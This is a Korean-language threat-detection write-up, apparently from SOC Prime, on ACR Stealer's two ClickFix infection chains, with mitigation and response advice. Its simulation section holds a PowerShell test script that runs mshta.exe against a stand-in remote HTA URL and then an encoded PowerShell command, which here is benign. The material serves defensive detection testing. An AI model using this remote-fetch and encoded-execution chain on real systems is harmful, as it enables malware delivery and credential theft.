SOC Prime Bias: 높음

20 Jul 2026 06:25 UTC

ACR Stealer: 위협 활동 증가 중 관찰된 두 가지 침입 체인

Author Photo
SOC Prime Team linkedin icon 팔로우
ACR Stealer: 위협 활동 증가 중 관찰된 두 가지 침입 체인
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

ACR Stealer는 ClickFix 스타일의 소셜 엔지니어링 미끼를 사용하여 기업 환경을 대상으로 하는 정보 탈취형 멀웨어 패밀리입니다. 이 악성코드는 Python 로더 및 블록체인 기반의 명령 및 제어를 사용하는 WebDAV 전달 페이로드와, 스테가노그래피 페이로드 전달을 사용하는 MSHTA를 포함한 두 가지 주요 감염 체인을 통해 작동합니다. 주요 목표는 브라우저 자격 증명, 인증 토큰 및 민감한 문서를 탈취하는 것입니다.

조사

Microsoft Defender Experts는 2026년 4월 말과 6월 중순 사이에 활동이 증가한 것을 관찰했습니다. 조사 결과, Python과 예약된 작업을 포함한 디스크 기반 캠페인 하나와 MSHTA 및 메모리 내 쉘코드 실행을 사용하는 파일리스 캠페인이라는 두 가지 실행 경로가 식별되었습니다. 분석가는 또한 타임스탐핑, 난독화된 PowerShell 및 블록체인 지원의 디드드롭 해상 등 고급 회피 방법을 문서화했습니다.

완화 조치

조직은 ClickFix 프롬프트를 인식할 수 있도록 사용자에게 교육하고 애플리케이션 컨트롤을 통해 신뢰할 수 없는 스크립트의 실행을 제한해야 합니다. 처음 접근 시도를 방해하도록 머드광고에 대한 노출을 줄이고 웹 필터링을 시행하는 것이 도움이 됩니다. 브라우저에 저장된 자격 증명에 대한 의존을 제한하고 다중 인증을 활용하여 자격 증명 탈취 위험을 줄이는 것을 통해 엔드포인트를 강화하는 것 또한 필수적입니다.

대응

이 활동이 감지되면 영향을 받은 장치는 즉시 격리되어야 하고 잠재적으로 손상된 모든 자격 증명과 토큰을 회전해야 합니다. 세션 토큰을 폐지하고 조사자는 의심스러운 원격 공유 또는 이미지 호스팅 서비스로의 아웃바운드 연결을 검토해야 합니다. 블록 모드에서 EDR을 사용하여 위협을 억제하고 악성 아티팩트를 효율적으로 제거해야 합니다.

공격 흐름

시뮬레이션 실행

사전 요구 사항: 원격 측정 및 기준 사전 점검을 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 적대 기술(TTP)의 정확한 실행을 상세히 설명합니다. 명령어와 설명은 반드시 식별된 TTP를 직접 반영하며 탐지 논리상 기대되는 정확한 원격 측정을 생성하도록 해야 합니다. 추상적이거나 관련 없는 예시는 잘못된 진단을 유발하게 됩니다.

  • 공격 서사 및 명령어: 적대자는 사용자를 가짜 “브라우저 오류”(ClickFix)로 목표합니다. 사용자가 명령어를 복사하여 터미널에 붙여 넣으면, cmd.exe 가 호출됩니다. 명령어는 mshta.exe 가 원격 URL로 접근하여 악성 스크립트를 가져오도록 지시합니다. 간단한 문자열 탐지를 더 회피하기 위해, 스크립트는 powershell.exe 와(과) 인코딩된 명령 (-Enc)을 사용하여 ACR Stealer 멀웨어를 메모리에서 다운로드하고 실행하여 전통적인 파일 기반 스캐닝을 우회합니다.

  • 회귀 테스트 스크립트:

    # ACR Stealer ClickFix 체인 시뮬레이션
    # Step 1: cmd.exe 래퍼 시뮬레이션
    # Step 2: mshta.exe와 URL 호출
    # Step 3: 인코딩된 PowerShell 명령어 뒤에 이어짐
    
    $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulating ACR Stealer Payload Execution'"))
    
    Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand"
  • 정리 명령어:

    # 이 시뮬레이션에서는 지속적인 파일이 생성되지 않지만 고아 상태의 프로세스가 남지 않도록 합니다
    Stop-Process -Name "mshta" -ErrorAction SilentlyContinue
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue